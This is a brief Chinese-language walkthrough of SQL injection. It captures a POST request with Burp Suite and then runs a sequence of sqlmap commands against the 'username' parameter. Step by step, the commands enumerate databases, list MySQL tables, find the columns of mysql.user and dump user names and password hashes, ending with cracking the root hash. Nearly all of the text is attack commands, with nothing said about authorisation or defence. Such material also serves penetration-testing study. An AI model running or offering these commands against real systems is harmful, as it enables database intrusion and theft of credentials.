1.利用bp获取POST请求包
2.利用sqlmap获取用用户名密码
sqlmap.py -r a.txt -p username --dbs
注:-r表示加载一个文件,-p指定参数
猜数据库获取数据表
sqlmap.py -r a.txt -p username -D mysql --tables
猜表获取数据列
sqlmap.py -r a.txt -p username -D mysql -T user --columns
猜数据
sqlmap.py -r a.txt -p username -D mysql -T user -C “User,Password” --dump
此时就得到了root用户的密码哈希值,解密即可